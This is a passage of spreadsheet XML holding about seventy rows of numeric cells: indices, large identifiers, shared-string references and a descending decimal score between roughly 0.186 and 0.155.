      </c>
    </row>
    <row r="19564" ht="15.75" customHeight="1">
      <c r="A19564" s="1">
        <v>18153.0</v>
      </c>
      <c r="B19564" s="2">
        <v>5.1869259E7</v>
      </c>
      <c r="C19564" s="2" t="s">
        <v>18854</v>
      </c>
      <c r="D19564" s="2">
        <v>1.0</v>
      </c>
      <c r="E19564" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19564" s="2">
        <v>0.1860670194003528</v>
      </c>
    </row>
    <row r="19565" ht="15.75" customHeight="1">
      <c r="A19565" s="1">
        <v>8146.0</v>
      </c>
      <c r="B19565" s="2">
        <v>5.3160016E7</v>
      </c>
      <c r="C19565" s="2" t="s">
        <v>18855</v>
      </c>
      <c r="D19565" s="2">
        <v>1.0</v>
      </c>
      <c r="E19565" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19565" s="2">
        <v>0.1858710562414266</v>
      </c>
    </row>
    <row r="19566" ht="15.75" customHeight="1">
      <c r="A19566" s="1">
        <v>1790.0</v>
      </c>
      <c r="B19566" s="2">
        <v>2.9100297E7</v>
      </c>
      <c r="C19566" s="2" t="s">
        <v>18856</v>
      </c>
      <c r="D19566" s="2">
        <v>1.0</v>
      </c>
      <c r="E19566" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19566" s="2">
        <v>0.1854700854700855</v>
      </c>
    </row>
    <row r="19567" ht="15.75" customHeight="1">
      <c r="A19567" s="1">
        <v>24777.0</v>
      </c>
      <c r="B19567" s="2">
        <v>1.1896756E7</v>
      </c>
      <c r="C19567" s="2" t="s">
        <v>18857</v>
      </c>
      <c r="D19567" s="2">
        <v>1.0</v>
      </c>
      <c r="E19567" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19567" s="2">
        <v>0.1844993141289438</v>
      </c>
    </row>
    <row r="19568" ht="15.75" customHeight="1">
      <c r="A19568" s="1">
        <v>14618.0</v>
      </c>
      <c r="B19568" s="2">
        <v>4.0270472E7</v>
      </c>
      <c r="C19568" s="2" t="s">
        <v>18858</v>
      </c>
      <c r="D19568" s="2">
        <v>1.0</v>
      </c>
      <c r="E19568" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19568" s="2">
        <v>0.1837606837606838</v>
      </c>
    </row>
    <row r="19569" ht="15.75" customHeight="1">
      <c r="A19569" s="1">
        <v>10544.0</v>
      </c>
      <c r="B19569" s="2">
        <v>1.2415134E7</v>
      </c>
      <c r="C19569" s="2" t="s">
        <v>18859</v>
      </c>
      <c r="D19569" s="2">
        <v>1.0</v>
      </c>
      <c r="E19569" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19569" s="2">
        <v>0.1827697262479872</v>
      </c>
    </row>
    <row r="19570" ht="15.75" customHeight="1">
      <c r="A19570" s="1">
        <v>10432.0</v>
      </c>
      <c r="B19570" s="2">
        <v>1.0334645E7</v>
      </c>
      <c r="C19570" s="2" t="s">
        <v>18860</v>
      </c>
      <c r="D19570" s="2">
        <v>1.0</v>
      </c>
      <c r="E19570" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19570" s="2">
        <v>0.1824074074074074</v>
      </c>
    </row>
    <row r="19571" ht="15.75" customHeight="1">
      <c r="A19571" s="1">
        <v>7901.0</v>
      </c>
      <c r="B19571" s="2">
        <v>5.2480905E7</v>
      </c>
      <c r="C19571" s="2" t="s">
        <v>18861</v>
      </c>
      <c r="D19571" s="2">
        <v>1.0</v>
      </c>
      <c r="E19571" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19571" s="2">
        <v>0.1815476190476191</v>
      </c>
    </row>
    <row r="19572" ht="15.75" customHeight="1">
      <c r="A19572" s="1">
        <v>8373.0</v>
      </c>
      <c r="B19572" s="2">
        <v>5.3810109E7</v>
      </c>
      <c r="C19572" s="2" t="s">
        <v>18861</v>
      </c>
      <c r="D19572" s="2">
        <v>1.0</v>
      </c>
      <c r="E19572" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19572" s="2">
        <v>0.1815476190476191</v>
      </c>
    </row>
    <row r="19573" ht="15.75" customHeight="1">
      <c r="A19573" s="1">
        <v>10559.0</v>
      </c>
      <c r="B19573" s="2">
        <v>1.2696256E7</v>
      </c>
      <c r="C19573" s="2" t="s">
        <v>18862</v>
      </c>
      <c r="D19573" s="2">
        <v>1.0</v>
      </c>
      <c r="E19573" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19573" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="19574" ht="15.75" customHeight="1">
      <c r="A19574" s="1">
        <v>17820.0</v>
      </c>
      <c r="B19574" s="2">
        <v>5.0910118E7</v>
      </c>
      <c r="C19574" s="2" t="s">
        <v>18863</v>
      </c>
      <c r="D19574" s="2">
        <v>1.0</v>
      </c>
      <c r="E19574" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19574" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="19575" ht="15.75" customHeight="1">
      <c r="A19575" s="1">
        <v>13414.0</v>
      </c>
      <c r="B19575" s="2">
        <v>3.5023938E7</v>
      </c>
      <c r="C19575" s="2" t="s">
        <v>18864</v>
      </c>
      <c r="D19575" s="2">
        <v>1.0</v>
      </c>
      <c r="E19575" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19575" s="2">
        <v>0.180365296803653</v>
      </c>
    </row>
    <row r="19576" ht="15.75" customHeight="1">
      <c r="A19576" s="1">
        <v>17366.0</v>
      </c>
      <c r="B19576" s="2">
        <v>4.9501234E7</v>
      </c>
      <c r="C19576" s="2" t="s">
        <v>18865</v>
      </c>
      <c r="D19576" s="2">
        <v>1.0</v>
      </c>
      <c r="E19576" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19576" s="2">
        <v>0.1796875000000001</v>
      </c>
    </row>
    <row r="19577" ht="15.75" customHeight="1">
      <c r="A19577" s="1">
        <v>1863.0</v>
      </c>
      <c r="B19577" s="2">
        <v>2.9573836E7</v>
      </c>
      <c r="C19577" s="2" t="s">
        <v>18866</v>
      </c>
      <c r="D19577" s="2">
        <v>1.0</v>
      </c>
      <c r="E19577" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19577" s="2">
        <v>0.1794171220400729</v>
      </c>
    </row>
    <row r="19578" ht="15.75" customHeight="1">
      <c r="A19578" s="1">
        <v>4136.0</v>
      </c>
      <c r="B19578" s="2">
        <v>4.1387443E7</v>
      </c>
      <c r="C19578" s="2" t="s">
        <v>18867</v>
      </c>
      <c r="D19578" s="2">
        <v>1.0</v>
      </c>
      <c r="E19578" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19578" s="2">
        <v>0.1790935672514621</v>
      </c>
    </row>
    <row r="19579" ht="15.75" customHeight="1">
      <c r="A19579" s="1">
        <v>15981.0</v>
      </c>
      <c r="B19579" s="2">
        <v>4.4910434E7</v>
      </c>
      <c r="C19579" s="2" t="s">
        <v>18868</v>
      </c>
      <c r="D19579" s="2">
        <v>1.0</v>
      </c>
      <c r="E19579" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19579" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="19580" ht="15.75" customHeight="1">
      <c r="A19580" s="1">
        <v>3696.0</v>
      </c>
      <c r="B19580" s="2">
        <v>3.9540089E7</v>
      </c>
      <c r="C19580" s="2" t="s">
        <v>18869</v>
      </c>
      <c r="D19580" s="2">
        <v>1.0</v>
      </c>
      <c r="E19580" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19580" s="2">
        <v>0.1782752902155887</v>
      </c>
    </row>
    <row r="19581" ht="15.75" customHeight="1">
      <c r="A19581" s="1">
        <v>4272.0</v>
      </c>
      <c r="B19581" s="2">
        <v>4.1874352E7</v>
      </c>
      <c r="C19581" s="2" t="s">
        <v>18870</v>
      </c>
      <c r="D19581" s="2">
        <v>1.0</v>
      </c>
      <c r="E19581" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19581" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="19582" ht="15.75" customHeight="1">
      <c r="A19582" s="1">
        <v>18255.0</v>
      </c>
      <c r="B19582" s="2">
        <v>5.216721E7</v>
      </c>
      <c r="C19582" s="2" t="s">
        <v>18871</v>
      </c>
      <c r="D19582" s="2">
        <v>1.0</v>
      </c>
      <c r="E19582" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19582" s="2">
        <v>0.1766975308641976</v>
      </c>
    </row>
    <row r="19583" ht="15.75" customHeight="1">
      <c r="A19583" s="1">
        <v>8719.0</v>
      </c>
      <c r="B19583" s="2">
        <v>5.4477942E7</v>
      </c>
      <c r="C19583" s="2" t="s">
        <v>18872</v>
      </c>
      <c r="D19583" s="2">
        <v>1.0</v>
      </c>
      <c r="E19583" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19583" s="2">
        <v>0.175925925925926</v>
      </c>
    </row>
    <row r="19584" ht="15.75" customHeight="1">
      <c r="A19584" s="1">
        <v>29234.0</v>
      </c>
      <c r="B19584" s="2">
        <v>3.0832667E7</v>
      </c>
      <c r="C19584" s="2" t="s">
        <v>18873</v>
      </c>
      <c r="D19584" s="2">
        <v>1.0</v>
      </c>
      <c r="E19584" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19584" s="2">
        <v>0.1737213403880071</v>
      </c>
    </row>
    <row r="19585" ht="15.75" customHeight="1">
      <c r="A19585" s="1">
        <v>11856.0</v>
      </c>
      <c r="B19585" s="2">
        <v>2.4816944E7</v>
      </c>
      <c r="C19585" s="2" t="s">
        <v>18874</v>
      </c>
      <c r="D19585" s="2">
        <v>1.0</v>
      </c>
      <c r="E19585" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19585" s="2">
        <v>0.1731078904991949</v>
      </c>
    </row>
    <row r="19586" ht="15.75" customHeight="1">
      <c r="A19586" s="1">
        <v>5660.0</v>
      </c>
      <c r="B19586" s="2">
        <v>4.6292162E7</v>
      </c>
      <c r="C19586" s="2" t="s">
        <v>18875</v>
      </c>
      <c r="D19586" s="2">
        <v>1.0</v>
      </c>
      <c r="E19586" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19586" s="2">
        <v>0.1729390681003585</v>
      </c>
    </row>
    <row r="19587" ht="15.75" customHeight="1">
      <c r="A19587" s="1">
        <v>18057.0</v>
      </c>
      <c r="B19587" s="2">
        <v>5.1587271E7</v>
      </c>
      <c r="C19587" s="2" t="s">
        <v>18876</v>
      </c>
      <c r="D19587" s="2">
        <v>1.0</v>
      </c>
      <c r="E19587" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19587" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="19588" ht="15.75" customHeight="1">
      <c r="A19588" s="1">
        <v>15946.0</v>
      </c>
      <c r="B19588" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C19588" s="2" t="s">
        <v>18877</v>
      </c>
      <c r="D19588" s="2">
        <v>1.0</v>
      </c>
      <c r="E19588" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19588" s="2">
        <v>0.1715686274509804</v>
      </c>
    </row>
    <row r="19589" ht="15.75" customHeight="1">
      <c r="A19589" s="1">
        <v>4459.0</v>
      </c>
      <c r="B19589" s="2">
        <v>4.2436657E7</v>
      </c>
      <c r="C19589" s="2" t="s">
        <v>18878</v>
      </c>
      <c r="D19589" s="2">
        <v>1.0</v>
      </c>
      <c r="E19589" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19589" s="2">
        <v>0.171455938697318</v>
      </c>
    </row>
    <row r="19590" ht="15.75" customHeight="1">
      <c r="A19590" s="1">
        <v>12552.0</v>
      </c>
      <c r="B19590" s="2">
        <v>2.9870979E7</v>
      </c>
      <c r="C19590" s="2" t="s">
        <v>18879</v>
      </c>
      <c r="D19590" s="2">
        <v>1.0</v>
      </c>
      <c r="E19590" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19590" s="2">
        <v>0.1705653021442496</v>
      </c>
    </row>
    <row r="19591" ht="15.75" customHeight="1">
      <c r="A19591" s="1">
        <v>9196.0</v>
      </c>
      <c r="B19591" s="2">
        <v>5.5395847E7</v>
      </c>
      <c r="C19591" s="2" t="s">
        <v>18880</v>
      </c>
      <c r="D19591" s="2">
        <v>1.0</v>
      </c>
      <c r="E19591" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19591" s="2">
        <v>0.1698872785829308</v>
      </c>
    </row>
    <row r="19592" ht="15.75" customHeight="1">
      <c r="A19592" s="1">
        <v>19821.0</v>
      </c>
      <c r="B19592" s="2">
        <v>5.6976268E7</v>
      </c>
      <c r="C19592" s="2" t="s">
        <v>18881</v>
      </c>
      <c r="D19592" s="2">
        <v>1.0</v>
      </c>
      <c r="E19592" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19592" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="19593" ht="15.75" customHeight="1">
      <c r="A19593" s="1">
        <v>4241.0</v>
      </c>
      <c r="B19593" s="2">
        <v>4.1789363E7</v>
      </c>
      <c r="C19593" s="2" t="s">
        <v>18882</v>
      </c>
      <c r="D19593" s="2">
        <v>1.0</v>
      </c>
      <c r="E19593" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19593" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="19594" ht="15.75" customHeight="1">
      <c r="A19594" s="1">
        <v>1122.0</v>
      </c>
      <c r="B19594" s="2">
        <v>2.4146574E7</v>
      </c>
      <c r="C19594" s="2" t="s">
        <v>18883</v>
      </c>
      <c r="D19594" s="2">
        <v>1.0</v>
      </c>
      <c r="E19594" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19594" s="2">
        <v>0.1651017214397496</v>
      </c>
    </row>
    <row r="19595" ht="15.75" customHeight="1">
      <c r="A19595" s="1">
        <v>17874.0</v>
      </c>
      <c r="B19595" s="2">
        <v>5.1027859E7</v>
      </c>
      <c r="C19595" s="2" t="s">
        <v>18884</v>
      </c>
      <c r="D19595" s="2">
        <v>1.0</v>
      </c>
      <c r="E19595" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19595" s="2">
        <v>0.164957264957265</v>
      </c>
    </row>
    <row r="19596" ht="15.75" customHeight="1">
      <c r="A19596" s="1">
        <v>15571.0</v>
      </c>
      <c r="B19596" s="2">
        <v>4.3430923E7</v>
      </c>
      <c r="C19596" s="2" t="s">
        <v>18885</v>
      </c>
      <c r="D19596" s="2">
        <v>1.0</v>
      </c>
      <c r="E19596" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19596" s="2">
        <v>0.1649029982363316</v>
      </c>
    </row>
    <row r="19597" ht="15.75" customHeight="1">
      <c r="A19597" s="1">
        <v>334.0</v>
      </c>
      <c r="B19597" s="2">
        <v>1.581964E7</v>
      </c>
      <c r="C19597" s="2" t="s">
        <v>18886</v>
      </c>
      <c r="D19597" s="2">
        <v>1.0</v>
      </c>
      <c r="E19597" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19597" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="19598" ht="15.75" customHeight="1">
      <c r="A19598" s="1">
        <v>6327.0</v>
      </c>
      <c r="B19598" s="2">
        <v>4.8285002E7</v>
      </c>
      <c r="C19598" s="2" t="s">
        <v>18887</v>
      </c>
      <c r="D19598" s="2">
        <v>1.0</v>
      </c>
      <c r="E19598" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19598" s="2">
        <v>0.1642156862745099</v>
      </c>
    </row>
    <row r="19599" ht="15.75" customHeight="1">
      <c r="A19599" s="1">
        <v>9903.0</v>
      </c>
      <c r="B19599" s="2">
        <v>5.6771662E7</v>
      </c>
      <c r="C19599" s="2" t="s">
        <v>18888</v>
      </c>
      <c r="D19599" s="2">
        <v>1.0</v>
      </c>
      <c r="E19599" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19599" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="19600" ht="15.75" customHeight="1">
      <c r="A19600" s="1">
        <v>398.0</v>
      </c>
      <c r="B19600" s="2">
        <v>1.6669888E7</v>
      </c>
      <c r="C19600" s="2" t="s">
        <v>18889</v>
      </c>
      <c r="D19600" s="2">
        <v>1.0</v>
      </c>
      <c r="E19600" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19600" s="2">
        <v>0.1635367762128326</v>
      </c>
    </row>
    <row r="19601" ht="15.75" customHeight="1">
      <c r="A19601" s="1">
        <v>10805.0</v>
      </c>
      <c r="B19601" s="2">
        <v>1.5836575E7</v>
      </c>
      <c r="C19601" s="2" t="s">
        <v>18886</v>
      </c>
      <c r="D19601" s="2">
        <v>1.0</v>
      </c>
      <c r="E19601" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19601" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="19602" ht="15.75" customHeight="1">
      <c r="A19602" s="1">
        <v>2257.0</v>
      </c>
      <c r="B19602" s="2">
        <v>3.2364423E7</v>
      </c>
      <c r="C19602" s="2" t="s">
        <v>18890</v>
      </c>
      <c r="D19602" s="2">
        <v>1.0</v>
      </c>
      <c r="E19602" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19602" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="19603" ht="15.75" customHeight="1">
      <c r="A19603" s="1">
        <v>301.0</v>
      </c>
      <c r="B19603" s="2">
        <v>1.5508655E7</v>
      </c>
      <c r="C19603" s="2" t="s">
        <v>18891</v>
      </c>
      <c r="D19603" s="2">
        <v>1.0</v>
      </c>
      <c r="E19603" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19603" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="19604" ht="15.75" customHeight="1">
      <c r="A19604" s="1">
        <v>7562.0</v>
      </c>
      <c r="B19604" s="2">
        <v>5.1553734E7</v>
      </c>
      <c r="C19604" s="2" t="s">
        <v>18892</v>
      </c>
      <c r="D19604" s="2">
        <v>1.0</v>
      </c>
      <c r="E19604" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19604" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="19605" ht="15.75" customHeight="1">
      <c r="A19605" s="1">
        <v>2358.0</v>
      </c>
      <c r="B19605" s="2">
        <v>3.3145533E7</v>
      </c>
      <c r="C19605" s="2" t="s">
        <v>18893</v>
      </c>
      <c r="D19605" s="2">
        <v>1.0</v>
      </c>
      <c r="E19605" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19605" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="19606" ht="15.75" customHeight="1">
      <c r="A19606" s="1">
        <v>15802.0</v>
      </c>
      <c r="B19606" s="2">
        <v>4.4218163E7</v>
      </c>
      <c r="C19606" s="2" t="s">
        <v>18894</v>
      </c>
      <c r="D19606" s="2">
        <v>1.0</v>
      </c>
      <c r="E19606" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19606" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="19607" ht="15.75" customHeight="1">
      <c r="A19607" s="1">
        <v>1823.0</v>
      </c>
      <c r="B19607" s="2">
        <v>2.9280885E7</v>
      </c>
      <c r="C19607" s="2" t="s">
        <v>18895</v>
      </c>
      <c r="D19607" s="2">
        <v>1.0</v>
      </c>
      <c r="E19607" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19607" s="2">
        <v>0.1609477124183007</v>
      </c>
    </row>
    <row r="19608" ht="15.75" customHeight="1">
      <c r="A19608" s="1">
        <v>17875.0</v>
      </c>
      <c r="B19608" s="2">
        <v>5.1027859E7</v>
      </c>
      <c r="C19608" s="2" t="s">
        <v>18896</v>
      </c>
      <c r="D19608" s="2">
        <v>1.0</v>
      </c>
      <c r="E19608" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19608" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="19609" ht="15.75" customHeight="1">
      <c r="A19609" s="1">
        <v>13388.0</v>
      </c>
      <c r="B19609" s="2">
        <v>3.4941576E7</v>
      </c>
      <c r="C19609" s="2" t="s">
        <v>18897</v>
      </c>
      <c r="D19609" s="2">
        <v>1.0</v>
      </c>
      <c r="E19609" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19609" s="2">
        <v>0.1605902777777778</v>
      </c>
    </row>
    <row r="19610" ht="15.75" customHeight="1">
      <c r="A19610" s="1">
        <v>11014.0</v>
      </c>
      <c r="B19610" s="2">
        <v>1.7799009E7</v>
      </c>
      <c r="C19610" s="2" t="s">
        <v>18898</v>
      </c>
      <c r="D19610" s="2">
        <v>1.0</v>
      </c>
      <c r="E19610" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19610" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="19611" ht="15.75" customHeight="1">
      <c r="A19611" s="1">
        <v>6769.0</v>
      </c>
      <c r="B19611" s="2">
        <v>4.9427776E7</v>
      </c>
      <c r="C19611" s="2" t="s">
        <v>18899</v>
      </c>
      <c r="D19611" s="2">
        <v>1.0</v>
      </c>
      <c r="E19611" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19611" s="2">
        <v>0.1601851851851852</v>
      </c>
    </row>
    <row r="19612" ht="15.75" customHeight="1">
      <c r="A19612" s="1">
        <v>5947.0</v>
      </c>
      <c r="B19612" s="2">
        <v>4.7285679E7</v>
      </c>
      <c r="C19612" s="2" t="s">
        <v>18900</v>
      </c>
      <c r="D19612" s="2">
        <v>1.0</v>
      </c>
      <c r="E19612" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19612" s="2">
        <v>0.1592592592592593</v>
      </c>
    </row>
    <row r="19613" ht="15.75" customHeight="1">
      <c r="A19613" s="1">
        <v>16352.0</v>
      </c>
      <c r="B19613" s="2">
        <v>4.6101409E7</v>
      </c>
      <c r="C19613" s="2" t="s">
        <v>18901</v>
      </c>
      <c r="D19613" s="2">
        <v>1.0</v>
      </c>
      <c r="E19613" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19613" s="2">
        <v>0.1590909090909091</v>
      </c>
    </row>
    <row r="19614" ht="15.75" customHeight="1">
      <c r="A19614" s="1">
        <v>11858.0</v>
      </c>
      <c r="B19614" s="2">
        <v>2.4839869E7</v>
      </c>
      <c r="C19614" s="2" t="s">
        <v>18902</v>
      </c>
      <c r="D19614" s="2">
        <v>1.0</v>
      </c>
      <c r="E19614" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19614" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="19615" ht="15.75" customHeight="1">
      <c r="A19615" s="1">
        <v>1116.0</v>
      </c>
      <c r="B19615" s="2">
        <v>2.4087761E7</v>
      </c>
      <c r="C19615" s="2" t="s">
        <v>18883</v>
      </c>
      <c r="D19615" s="2">
        <v>1.0</v>
      </c>
      <c r="E19615" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19615" s="2">
        <v>0.1588419405320814</v>
      </c>
    </row>
    <row r="19616" ht="15.75" customHeight="1">
      <c r="A19616" s="1">
        <v>11625.0</v>
      </c>
      <c r="B19616" s="2">
        <v>2.3129511E7</v>
      </c>
      <c r="C19616" s="2" t="s">
        <v>18903</v>
      </c>
      <c r="D19616" s="2">
        <v>1.0</v>
      </c>
      <c r="E19616" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19616" s="2">
        <v>0.158374792703151</v>
      </c>
    </row>
    <row r="19617" ht="15.75" customHeight="1">
      <c r="A19617" s="1">
        <v>15080.0</v>
      </c>
      <c r="B19617" s="2">
        <v>4.1743802E7</v>
      </c>
      <c r="C19617" s="2" t="s">
        <v>18904</v>
      </c>
      <c r="D19617" s="2">
        <v>1.0</v>
      </c>
      <c r="E19617" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19617" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="19618" ht="15.75" customHeight="1">
      <c r="A19618" s="1">
        <v>6183.0</v>
      </c>
      <c r="B19618" s="2">
        <v>4.7907716E7</v>
      </c>
      <c r="C19618" s="2" t="s">
        <v>18905</v>
      </c>
      <c r="D19618" s="2">
        <v>1.0</v>
      </c>
      <c r="E19618" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19618" s="2">
        <v>0.1575591985428051</v>
      </c>
    </row>
    <row r="19619" ht="15.75" customHeight="1">
      <c r="A19619" s="1">
        <v>5494.0</v>
      </c>
      <c r="B19619" s="2">
        <v>4.5786306E7</v>
      </c>
      <c r="C19619" s="2" t="s">
        <v>18906</v>
      </c>
      <c r="D19619" s="2">
        <v>1.0</v>
      </c>
      <c r="E19619" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19619" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="19620" ht="15.75" customHeight="1">
      <c r="A19620" s="1">
        <v>17711.0</v>
      </c>
      <c r="B19620" s="2">
        <v>5.0595642E7</v>
      </c>
      <c r="C19620" s="2" t="s">
        <v>18907</v>
      </c>
      <c r="D19620" s="2">
        <v>1.0</v>
      </c>
      <c r="E19620" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19620" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="19621" ht="15.75" customHeight="1">
      <c r="A19621" s="1">
        <v>7310.0</v>
      </c>
      <c r="B19621" s="2">
        <v>5.0860751E7</v>
      </c>
      <c r="C19621" s="2" t="s">
        <v>18908</v>
      </c>
      <c r="D19621" s="2">
        <v>1.0</v>
      </c>
      <c r="E19621" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19621" s="2">
        <v>0.156810035842294</v>
      </c>
    </row>
    <row r="19622" ht="15.75" customHeight="1">
      <c r="A19622" s="1">
        <v>17646.0</v>
      </c>
      <c r="B19622" s="2">
        <v>5.0409562E7</v>
      </c>
      <c r="C19622" s="2" t="s">
        <v>18909</v>
      </c>
      <c r="D19622" s="2">
        <v>1.0</v>
      </c>
      <c r="E19622" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19622" s="2">
        <v>0.1567164179104478</v>
      </c>
    </row>
    <row r="19623" ht="15.75" customHeight="1">
      <c r="A19623" s="1">
        <v>25561.0</v>
      </c>
      <c r="B19623" s="2">
        <v>1.4293498E7</v>
      </c>
      <c r="C19623" s="2" t="s">
        <v>18910</v>
      </c>
      <c r="D19623" s="2">
        <v>1.0</v>
      </c>
      <c r="E19623" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19623" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="19624" ht="15.75" customHeight="1">
      <c r="A19624" s="1">
        <v>29449.0</v>
      </c>
      <c r="B19624" s="2">
        <v>3.2242295E7</v>
      </c>
      <c r="C19624" s="2" t="s">
        <v>18911</v>
      </c>
      <c r="D19624" s="2">
        <v>1.0</v>
      </c>
      <c r="E19624" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19624" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="19625" ht="15.75" customHeight="1">
      <c r="A19625" s="1">
        <v>500.0</v>
      </c>
      <c r="B19625" s="2">
        <v>1.7968235E7</v>
      </c>
      <c r="C19625" s="2" t="s">
        <v>18912</v>
      </c>
      <c r="D19625" s="2">
        <v>1.0</v>
      </c>
      <c r="E19625" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19625" s="2">
        <v>0.1562500000000001</v>
      </c>
    </row>
    <row r="19626" ht="15.75" customHeight="1">
      <c r="A19626" s="1">
        <v>519.0</v>
      </c>
      <c r="B19626" s="2">
        <v>1.8238243E7</v>
      </c>
      <c r="C19626" s="2" t="s">
        <v>18913</v>
      </c>
      <c r="D19626" s="2">
        <v>1.0</v>
      </c>
      <c r="E19626" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19626" s="2">
        <v>0.1562091503267974</v>
      </c>
    </row>
    <row r="19627" ht="15.75" customHeight="1">
      <c r="A19627" s="1">
        <v>15760.0</v>
      </c>
      <c r="B19627" s="2">
        <v>4.416801E7</v>
      </c>
      <c r="C19627" s="2" t="s">
        <v>18914</v>
      </c>
      <c r="D19627" s="2">
        <v>1.0</v>
      </c>
      <c r="E19627" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19627" s="2">
        <v>0.1561302681992338</v>
      </c>
    </row>
    <row r="19628" ht="15.75" customHeight="1">
      <c r="A19628" s="1">
        <v>15705.0</v>
      </c>
      <c r="B19628" s="2">
        <v>4.3950296E7</v>
      </c>
      <c r="C19628" s="2" t="s">
        <v>18915</v>
      </c>
      <c r="D19628" s="2">
        <v>1.0</v>
      </c>
      <c r="E19628" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19628" s="2">
        <v>0.1560121765601218</v>
      </c>
    </row>
    <row r="19629" ht="15.75" customHeight="1">
      <c r="A19629" s="1">
        <v>12082.0</v>
      </c>
      <c r="B19629" s="2">
        <v>2.6703931E7</v>
      </c>
      <c r="C19629" s="2" t="s">
        <v>18916</v>
      </c>
      <c r="D19629" s="2">
        <v>1.0</v>
      </c>
      <c r="E19629" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19629" s="2">
        <v>0.1553819444444445</v>
      </c>
    </row>
    <row r="19630" ht="15.75" customHeight="1">
      <c r="A19630" s="1">
        <v>5533.0</v>
      </c>
      <c r="B19630" s="2">
        <v>4.5880281E7</v>
      </c>
      <c r="C19630" s="2" t="s">
        <v>18917</v>
      </c>
      <c r="D19630" s="2">
        <v>1.0</v>
      </c>
      <c r="E19630" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19630" s="2">
        <v>0.1553672316384181</v>
      </c>
